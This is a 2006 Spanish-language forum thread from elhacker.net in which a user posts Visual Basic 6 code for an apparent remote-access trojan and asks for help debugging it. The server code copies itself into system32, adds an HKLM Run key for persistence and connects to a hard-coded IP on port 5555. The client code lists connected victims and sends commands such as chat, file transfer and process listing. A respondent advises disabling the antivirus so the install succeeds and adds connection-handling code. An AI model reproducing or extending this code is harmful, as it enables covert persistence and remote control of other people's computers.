elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Error 70 en system32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Error 70 en system32  (Leído 2,309 veces)
shadow.darknesses

Desconectado Desconectado

Mensajes: 73


Ver Perfil
Error 70 en system32
« en: 22 Diciembre 2006, 17:02 pm »

Código:
Private Sub Form_Load()
Dim ruta As Variant, Residencia As Variant
Dim win
Dim sys
Dim obj
ruta = App.Path
If Right(ruta, 1) <> "\" Then ruta = ruta & "\"
ruta = ruta & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ruta, sys & "\ShaCCorTh.exe"
Set Residencia = CreateObject("WScript.Shell")
Residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ShaCCorTh", sys & "\ShaCCorTh.exe"
Ws.RemoteHost = "200.83.238.77"
Ws.RemotePort = 5555
SName = "ShaCCorTh"
App.TaskVisible = True
End Sub
ya la conexion esta bien, pero cuando me corre en system32 no me funciona, y si lo cambio de carpeta si funciona, como puedo solucionar ese problema, mirenlo

Saludos, y gracias


En línea




~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Error 70 en system32
« Respuesta #1 en: 22 Diciembre 2006, 23:40 pm »

Mira lo e contestado aki: http://foro.elhacker.net/index.php/topic,151715.0.html

Asi te tiene q funcionar a la fuerza...
1S4ludo


En línea

shadow.darknesses

Desconectado Desconectado

Mensajes: 73


Ver Perfil
Re: Error 70 en system32
« Respuesta #2 en: 23 Diciembre 2006, 00:34 am »

jeje, la wea de la segunda imagen no la tomes encuenta, me sale objeto no encontrado , y ya nose que acer
En línea




~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Error 70 en system32
« Respuesta #3 en: 23 Diciembre 2006, 12:33 pm »

Pero has mirado el post q te e dicho?? viene como hacer todo...
En línea

shadow.darknesses

Desconectado Desconectado

Mensajes: 73


Ver Perfil
Re: Error 70 en system32
« Respuesta #4 en: 23 Diciembre 2006, 12:56 pm »

Si me funciono, vi el post, pero no encuntro, nada para que me deje guardar en system32, con ese error 70
« Última modificación: 23 Diciembre 2006, 13:12 pm por shadow.darknesses » En línea




~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Error 70 en system32
« Respuesta #5 en: 23 Diciembre 2006, 14:23 pm »

Sera el AV (por lo q veo usas el Kav) kitalo del todo q alomejor ese es el prolema...
En línea

shadow.darknesses

Desconectado Desconectado

Mensajes: 73


Ver Perfil
Re: Error 70 en system32
« Respuesta #6 en: 23 Diciembre 2006, 18:22 pm »

si, ahi me funciono bien, pero tengo una gran duda
Código:
Dim i As Long

Private Sub Com_escuchar_Click()
On Error Resume Next
If Text_puerto.Text = "" Then
MsgBox "Necesitas poner el puerto", vbCritical
Exit Sub
End If
If Text_puerto.Text > 65535 Then
MsgBox "El puerto deve ser entre 1-65535", vbCritical
Text_puerto.Text = ""
Exit Sub
End If
If Com_escuchar.Caption = "Escuchar" Then
Ws(TotalIndex).Close
Ws(TotalIndex).LocalPort = Text_puerto.Text
Ws(TotalIndex).Listen
Label_estado.Caption = "Estado: Escuchando Puerto " & Text_puerto.Text
Text_puerto.Locked = True
Com_escuchar.Caption = "Cerrar"
Else
For i = 0 To TotalIndex
Ws(i).Close
Next
Lc.ListItems.Clear
Text_puerto.Locked = False
Label_estado.Caption = "Estado: Cerrado"
Com_escuchar.Caption = "Escuchar"
End If
End Sub

Private Sub Text_puerto_KeyPress(KeyAscii As Integer)
If KeyAscii = 8 Then Exit Sub
If Not IsNumeric(Chr(KeyAscii)) Then KeyAscii = 0
End Sub

Private Sub Form_Unload(Cancel As Integer)
End
End Sub

Private Sub Form_Load()
TotalIndex = 0
Call Lc.ColumnHeaders.Add(, , "Nombre", "1300,0631")
Call Lc.ColumnHeaders.Add(, , "Ip", "2200,2522")
Call Lc.ColumnHeaders.Add(, , "S.O", "1600,7166")
End Sub

Private Sub Lc_MouseUp(Button As Integer, Shift As Integer, X As Single, Y As Single)
Dim vindex As Long
On Error Resume Next
If Lc.SelectedItem.Selected = False Then Exit Sub
If Button = 2 Then
PopupMenu mnu_opciones
vindex = Lc.SelectedItem.Selected
End If
End Sub

Private Sub mnu_enviar_men_Click()
On Error Resume Next
frm_mensajes.Show
End Sub

Private Sub mnu_Lista_procesos_Click()
On Error Resume Next
frm_procesos.Show
End Sub

Private Sub mnu_trasnferencia_Click()
On Error Resume Next
frm_transferencia.Show
End Sub

Private Sub mnu_chat_Click()
On Error Resume Next
Envia "Chatini"
frm_chat.Show
End Sub

Private Sub mnu_Paint_Click()
On Error Resume Next
Envia "Paint"
End Sub

Private Sub mnu_Cerrar_server_Click()
On Error Resume Next
Envia "Cerrar"
End Sub

Private Sub Ws_ConnectionRequest(Index As Integer, ByVal requestID As Long)
  On Error GoTo error
   TotalIndex = TotalIndex + 1
   Ws(Index).Close
   Ws(Index).Accept requestID
   Load Ws(TotalIndex)
   Ws(TotalIndex).LocalPort = Text_puerto.Text
   Ws(TotalIndex).Listen
error:
End Sub
cuando le doi a escuchar
, ya todo bien, el server se me conecta, ya luego le doi cerrar, y se cierra, lueo le doi escuhar de nuevo, y no hay conexion, pero = me muestra los datos,y veo aki
, y me muestra que hay conexion, pero le di una opcion y me dice que se a perdido la conexion
lo uniko que se demoro como 7 segundos en que aparezca los datos, xq me dice que no hay conexion, pero me llegan los datos y en donde se muetran las coneciones me dice que esta conectado,
y cuando apreto x primera ves el comando escuchar, se conecta en 1 segundo
« Última modificación: 24 Diciembre 2006, 14:58 pm por shadow.darknesses » En línea




~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Error 70 en system32
« Respuesta #7 en: 24 Diciembre 2006, 13:24 pm »

Pues no se exactamnte como haras pero basicamente lo q hay q hacer es poner un timer q comprueve cada cierto tiempo las conexiones y si no se encuentran conectados los borre de la lista... mira un ejemplo:

Código:
Private Sub Timer1_Timer()
On Error Resume Next
Dim vIndex As Variant
Dim i As Long

For i = 1 To ListConexion.ListItems.Count 'Creamos un bucle
vIndex = Split(ListConexion.ListItems(i).Key, "|")

If WS(vIndex(0)).State <> 7 Then 'Si no estamos conectado
ListConexion.ListItems.Remove (i) 'Elimnaos la conexion
End If

Ponle un intervalo 10 o asi...
1S4ludo
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error system32
Windows
javierja 2 2,880 Último mensaje 2 Mayo 2012, 19:23 pm
por quintomv
Problemas con system32
Windows
choloo7 2 2,601 Último mensaje 15 Junio 2013, 17:08 pm
por ccrunch
cmd system32
Dudas Generales
klossfoto 2 2,201 Último mensaje 19 Junio 2013, 01:58 am
por Royca3
Directorio system32 desprotegido ¿Causa?
Hacking
33boy33 0 2,226 Último mensaje 6 Abril 2014, 19:35 pm
por 33boy33
Problema con System32
GNU/Linux
C13 4 9,427 Último mensaje 29 Noviembre 2023, 04:48 am
por D3s0rd3n
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines